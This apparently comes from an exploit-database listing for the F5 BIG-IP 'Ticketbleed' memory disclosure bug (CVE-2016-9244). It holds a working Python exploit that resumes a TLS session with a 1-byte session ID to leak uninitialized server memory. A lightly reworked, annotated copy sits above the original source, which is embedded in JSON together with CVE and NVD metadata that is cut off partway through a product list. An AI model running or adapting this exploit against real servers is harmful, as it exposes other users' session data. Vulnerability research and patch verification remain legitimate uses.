ID 1337DAY-ID-30168 Type zdt Reporter @0x00string Modified 2018-04-12T00:00:00
Description
Exploit for hardware platform in category remote exploits
# -*- coding: utf-8 -*-
#!/usr/bin/python
# Exploit Title: Ticketbleed
# Google Dork: n/a
# Exploit Author: @0x00string
# Vendor Homepage: https://f5.com/
# Software Link: https://support.f5.com/csp/article/K05121675
# Version: see software link for versions
# Tested on: F5 BIGIP 11.6
# CVE : CVE-2016-9244
# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)
import re, getopt, sys, socket
from struct import *
try:
from scapy_ssl_tls.ssl_tls import *
except ImportError:
from scapy.layers.ssl_tls import *
def banner():
    """Print the author's credits and ASCII-art logo to stdout."""
    art = '''
lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
'''
    # Same bytes as printing the literal: the text followed by one newline.
    sys.stdout.write(art + "\n")
def usage ():
    """Print the command-line help text, then terminate the process."""
    help_lines = [
        "python script.py <args>",
        " -h, --help: Show this message",
        " -a, --rhost: Target IP address",
        " -b, --rport: Target port",
        "",
        "",
        "Examples:",
        "python script.py -a 10.10.10.10 -b 443",
        "python script.py --rhost 10.10.10.10 --rport 8443",
    ]
    print("\n".join(help_lines))
    # exit() raises SystemExit, so callers never get control back.
    exit()
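def pretty (t, m):
    """Write message *m* to stdout behind a coloured status tag.

    Args:
        t: One of "+", "-", "*" or "!"; selects the tag and its ANSI colour
            (green, red, blue, yellow). Any other value prints nothing.
        m: Message text. A tab separates it from the tag and a newline is
            appended.
    """
    colours = {"+": "32", "-": "31", "*": "34", "!": "33"}
    # Look the tag up by value. The original compared with `is`, which tests
    # object identity and only matched because the interpreter happens to
    # share one object for short string literals.
    code = colours.get(t)
    if code is None:
        return
    sys.stdout.write("\x1b[" + code + ";1m[" + t + "]\x1b[0m\t" + m + "\n")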
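def createDump (input):
    """Render a byte string as a hex dump, 16 bytes per row.

    Each row holds the bytes as two-digit lowercase hex separated by spaces,
    padded to 56 columns, followed by the same bytes as space-separated
    characters and a newline.

    Changes from the original:
      * The comparison `e == '0x0'` could never match a single character and
        is removed; NUL still renders as "." as it effectively did before.
      * Only printable ASCII (0x20-0x7e) is shown literally. The original's
        second range test was always true, so bytes 30, 31, 127 and 128 were
        written to the terminal unfiltered. The dumped bytes come from a
        remote peer, so they are kept out of the terminal's control range.
      * Full rows are padded to the same 56-column offset the original used
        for the last partial row, so the text column lines up.

    Args:
        input: Bytes to dump (a `str` on Python 2). Text strings are encoded
            as latin-1 first.

    Returns:
        The formatted dump, or an empty string for empty input.
    """
    if not isinstance(input, (bytes, bytearray)):
        input = input.encode("latin-1")
    data = bytearray(input)  # iterating a bytearray yields ints on 2 and 3

    rows = []
    for start in range(0, len(data), 16):
        chunk = data[start:start + 16]
        hex_col = " ".join("%02x" % v for v in chunk)
        text_col = " ".join(chr(v) if 32 <= v <= 126 else "." for v in chunk)
        rows.append(hex_col.ljust(56) + text_col + "\n")
    return "".join(rows)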
def ticketBleed (rhost, rport):
    """Check one TLS endpoint for the CVE-2016-9244 session-ID echo.

    Makes two TLS 1.2 connections to (rhost, int(rport)). The first runs a
    full handshake that asks for a session ticket and keeps the ticket and
    master secret. The second offers that ticket for resumption with a
    1-byte session_id ("A") and prints, as a hex dump, the session_id the
    server returns in its ServerHello.

    Reading the result: per the CVE description, an affected BIG-IP virtual
    server (Client SSL profile with Session Tickets enabled) may return up to
    31 bytes of uninitialized memory after the byte it was sent. A server
    that is not affected is expected to return only the id it was given
    (NOTE(review): confirm against RFC 5077 behaviour). F5 article K05121675
    lists the fixed releases and the mitigation of clearing the Session
    Ticket option on the Client SSL profile.

    Args:
        rhost: Host to connect to.
        rport: Port, as a string or int; converted with int().

    NOTE(review): nothing here handles a server that issues no ticket or
    sends no ServerHello; the ret[...] lookups presumably raise in that case.
    """
    h = (rhost,int(rport));
    version = TLSVersion.TLS_1_2
    secret = ""
    session_ticket = ""
    sid = ""
    # NOTE(review): `cipher` is assigned but never used below; both
    # ClientHellos offer every suite in TLS_CIPHER_SUITES.
    cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
    # Connection 1: full handshake with an empty SessionTicket extension, which
    # asks the server to issue a new ticket.
    with TLSSocket(socket.socket(), client=True) as sock:
        sock.connect(h)
        ctx = sock.tls_ctx
        packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
        sock.sendall(packet)
        sock.recvall()
        # Client key exchange + ChangeCipherSpec, then Finished, to complete
        # the handshake so the server sends its NewSessionTicket.
        packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
        packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
        sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
        sock.sendall(to_raw(TLSFinished(), ctx))
        ret = sock.recvall()
        # Keep what is needed to resume: the ticket and the master secret.
        session_ticket = ret[TLSSessionTicket].ticket
        secret = ctx.master_secret
    #pretty("*", "ctx 1: \n" + str(ctx))
    # Connection 2: resume with the saved ticket and a deliberately short
    # (1-byte) session_id; only the ServerHello is read back.
    with TLSSocket(socket.socket(), client=True) as sock:
        sock.connect(h)
        ctx = sock.tls_ctx
        packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
        sock.tls_ctx.resume_session(secret)
        sock.sendall(packet)
        ret = sock.recvall()
        # The session_id returned by the server is the value under inspection.
        sid = ret[TLSServerHello].session_id
    #pretty("*", "ctx 2: \n" + str(ctx))
    pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))
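def main():
    """Parse the command line and run the check against one host and port.

    Options: -a/--rhost <host>, -b/--rport <port>, -h/--help. Prints the
    usage text and exits when help is requested, when an option cannot be
    parsed, or when host or port is missing.
    """
    rhost = None
    rport = None
    try:
        # "h" takes no argument. The original spec "h:" made a bare -h fail
        # with "option -h requires argument" instead of showing the help.
        options, _ = getopt.getopt(sys.argv[1:], 'a:b:h', ['rhost=', 'rport=', 'help'])
    except getopt.GetoptError as err:
        # Report the bad option and show usage rather than a traceback.
        sys.stderr.write(str(err) + "\n")
        usage()
        return
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a', '--rhost'):
            rhost = arg
        elif opt in ('-b', '--rport'):
            rport = arg
    banner()
    if rhost is None or rport is None:
        usage()
    ticketBleed(rhost, rport)
    exit(0)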
# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()
{"sourceData": "# -*- coding: utf-8 -*-\r\n#!/usr/bin/python\r\n# Exploit Title: Ticketbleed\r\n# Google Dork: n/a\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: https://f5.com/\r\n# Software Link: https://support.f5.com/csp/article/K05121675\r\n# Version: see software link for versions\r\n# Tested on: F5 BIGIP 11.6\r\n# CVE : CVE-2016-9244\r\n# require: scapy_ssl_tls (https://github.com/tintinweb/scapy-ssl_tls)\r\nimport re, getopt, sys, socket\r\nfrom struct import *\r\ntry:\r\n from scapy_ssl_tls.ssl_tls import *\r\nexcept ImportError:\r\n from scapy.layers.ssl_tls import *\r\n \r\ndef banner():\r\n print '''\r\n lol ty filippo!\r\n ty tintinweb!\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\nhttps://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py\r\n'''\r\n \r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target port\\n\"\r\n \"\\n\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 443\\n\"\r\n \"python script.py --rhost 10.10.10.10 --rport 8443\")\r\n exit()\r\n \r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print 
\"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n \r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n \r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n return d\r\n \r\ndef ticketBleed (rhost, rport):\r\n h = (rhost,int(rport));\r\n version = TLSVersion.TLS_1_2\r\n secret = \"\"\r\n session_ticket = \"\"\r\n sid = \"\"\r\n cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=\"\")])\r\n sock.sendall(packet)\r\n sock.recvall()\r\n packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()\r\n packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()\r\n sock.sendall(TLS.from_records([packet_ke, packet_ccs]))\r\n sock.sendall(to_raw(TLSFinished(), ctx))\r\n ret = sock.recvall()\r\n session_ticket = ret[TLSSessionTicket].ticket\r\n secret = ctx.master_secret\r\n #pretty(\"*\", \"ctx 1: \\n\" + str(ctx))\r\n with TLSSocket(socket.socket(), client=True) as sock:\r\n sock.connect(h)\r\n ctx = sock.tls_ctx\r\n packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id=\"A\", 
extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])\r\n sock.tls_ctx.resume_session(secret)\r\n sock.sendall(packet)\r\n ret = sock.recvall()\r\n sid = ret[TLSServerHello].session_id\r\n #pretty(\"*\", \"ctx 2: \\n\" + str(ctx))\r\n pretty(\"+\", \"bled 'A' + 31 bytes: \\n\" + createDump(sid))\r\n \r\ndef main():\r\n rhost = None;\r\n rport = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n ticketBleed(rhost,rport)\r\n exit(0);\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-04-13] #", "description": "Exploit for hardware platform in category remote exploits", "sourceHref": "https://0day.today/exploit/30168", "reporter": "@0x00string", "href": "https://0day.today/exploit/description/30168", "type": "zdt", "viewCount": 33, "references": [], "lastseen": "2018-04-13T07:49:34", "published": "2018-04-12T00:00:00", "cvelist": ["CVE-2016-9244"], "id": "1337DAY-ID-30168", "modified": "2018-04-12T00:00:00", "title": "F5 BIG-IP 11.6 SSL Virtual Server - Ticketbleed Memory Disclosure Exploit", "edition": 1, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2018-04-13T07:49:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9244"]}, {"type": "f5", "idList": ["F5:K05121675"]}, {"type": "seebug", "idList": ["SSV:92673"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140168", "OPENVAS:1361412562310140194", "OPENVAS:1361412562310140155", "OPENVAS:1361412562310140223", "OPENVAS:1361412562310140192", "OPENVAS:1361412562310140221", "OPENVAS:1361412562310140179", 
"OPENVAS:1361412562310140169", "OPENVAS:1361412562310140178", "OPENVAS:1361412562310140181"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EE5EA4ECE0C61538EC30487A371A1C90", "EXPLOITPACK:4DF698AC9A73D3D4108BA1E66FD1CF8C"]}, {"type": "exploitdb", "idList": ["EDB-ID:41298", "EDB-ID:44446"]}, {"type": "nessus", "idList": ["F5_SESSION_ID_MEM_DISCLOSURE.NASL", "F5_BIGIP_SOL05121675.NASL"]}, {"type": "filippoio", "idList": ["FILIPPOIO:40FACE5F541A5201E7FCDFC21AC6E3D2", "FILIPPOIO:32170BE31128BEE98AEEE466ABFDA40A"]}, {"type": "nmap", "idList": ["NMAP:TLS-TICKETBLEED.NSE"]}], "modified": "2018-04-13T07:49:34", "rev": 2}, "vulnersScore": 5.1}, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:28:13", "description": "A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-09T15:59:00", "title": "CVE-2016-9244", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9244"], "modified": "2019-06-06T15:11:00", "cpe": ["cpe:/a:f5:big-ip_application_acceleration_manager:11.5.1", "cpe:/a:f5:big-ip_analytics:11.5.2", "cpe:/a:f5:big-ip_link_controller:11.6.1", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.1", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.1", "cpe:/a:f5:big-ip_application_security_manager:11.4.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.4.0", "cpe:/a:f5:big-ip_access_policy_manager:11.6.1", "cpe:/a:f5:big-ip_application_security_manager:12.1.1", 
"cpe:/a:f5:big-ip_local_traffic_manager:12.0.0", "cpe:/a:f5:big-ip_link_controller:11.5.2", "cpe:/a:f5:big-ip_global_traffic_manager:11.6.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.4", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.2", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.0", "cpe:/a:f5:big-ip_access_policy_manager:11.4.1", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.0", "cpe:/a:f5:big-ip_access_policy_manager:11.5.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.4.1", "cpe:/a:f5:big-ip_analytics:11.4.0", "cpe:/a:f5:big-ip_application_security_manager:11.6.1", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.2", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.1", "cpe:/a:f5:big-ip_link_controller:12.1.1", "cpe:/a:f5:big-ip_link_controller:11.5.4", "cpe:/a:f5:big-ip_link_controller:12.1.2", "cpe:/a:f5:big-ip_access_policy_manager:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.2", "cpe:/a:f5:big-ip_access_policy_manager:12.1.0", "cpe:/a:f5:big-ip_application_security_manager:11.4.0", "cpe:/a:f5:big-ip_link_controller:11.4.0", "cpe:/a:f5:big-ip_analytics:12.1.1", "cpe:/a:f5:big-ip_application_security_manager:12.1.2", "cpe:/a:f5:big-ip_access_policy_manager:12.1.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.2", "cpe:/a:f5:big-ip_access_policy_manager:11.5.2", "cpe:/a:f5:big-ip_access_policy_manager:11.4.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.1.0", "cpe:/a:f5:big-ip_analytics:11.5.1", "cpe:/a:f5:big-ip_analytics:11.5.4", "cpe:/a:f5:big-ip_local_traffic_manager:12.1.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.0", "cpe:/a:f5:big-ip_link_controller:11.6.0", "cpe:/a:f5:big-ip_access_policy_manager:12.0.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.6.0", "cpe:/a:f5:big-ip_application_security_manager:12.0.0", 
"cpe:/a:f5:big-ip_application_security_manager:11.5.2", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.4", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.4.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.0", "cpe:/a:f5:big-ip_analytics:11.6.1", "cpe:/a:f5:big-ip_analytics:12.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.0.0", "cpe:/a:f5:big-ip_access_policy_manager:11.5.0", "cpe:/a:f5:big-ip_link_controller:11.5.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.2", "cpe:/a:f5:big-ip_access_policy_manager:11.5.3", "cpe:/a:f5:big-ip_application_acceleration_manager:11.4.1", "cpe:/a:f5:big-ip_application_security_manager:11.5.1", "cpe:/a:f5:big-ip_protocol_security_module:11.4.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.6.1", "cpe:/a:f5:big-ip_application_acceleration_manager:11.5.3", "cpe:/a:f5:big-ip_link_controller:11.5.3", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.1.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.3", "cpe:/a:f5:big-ip_application_security_manager:11.6.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.1", "cpe:/a:f5:big-ip_link_controller:11.5.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.0", "cpe:/a:f5:big-ip_analytics:11.6.0", "cpe:/a:f5:big-ip_application_acceleration_manager:12.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:11.4.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.4", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.2", "cpe:/a:f5:big-ip_analytics:11.5.3", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.3", "cpe:/a:f5:big-ip_global_traffic_manager:11.4.0", "cpe:/a:f5:big-ip_analytics:11.5.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.3", "cpe:/a:f5:big-ip_application_security_manager:11.5.4", 
"cpe:/a:f5:big-ip_application_security_manager:12.1.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.3", "cpe:/a:f5:big-ip_access_policy_manager:12.1.2", "cpe:/a:f5:big-ip_policy_enforcement_manager:12.1.2", "cpe:/a:f5:big-ip_application_acceleration_manager:11.4.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.4.1", "cpe:/a:f5:big-ip_link_controller:12.1.0", "cpe:/a:f5:big-ip_access_policy_manager:11.5.4", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.4", "cpe:/a:f5:big-ip_global_traffic_manager:11.4.1", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.4", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.5.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.5.1", "cpe:/a:f5:big-ip_application_acceleration_manager:11.6.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:12.0.0", "cpe:/a:f5:big-ip_link_controller:11.4.1", "cpe:/a:f5:big-ip_advanced_firewall_manager:11.4.0", "cpe:/a:f5:big-ip_protocol_security_module:11.4.1", "cpe:/a:f5:big-ip_policy_enforcement_manager:11.6.0", "cpe:/a:f5:big-ip_analytics:12.1.2", "cpe:/a:f5:big-ip_local_traffic_manager:11.5.1", "cpe:/a:f5:big-ip_global_traffic_manager:11.5.1", "cpe:/a:f5:big-ip_analytics:12.1.0", "cpe:/a:f5:big-ip_link_controller:12.0.0", "cpe:/a:f5:big-ip_analytics:11.4.1", "cpe:/a:f5:big-ip_application_security_manager:11.5.3", "cpe:/a:f5:big-ip_application_security_manager:11.5.0"], "id": "CVE-2016-9244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_link_controller:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_application_security_manager:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:11.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:11.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:11.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:11.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:12.0.0:*:*:*:*:*:*:*", 
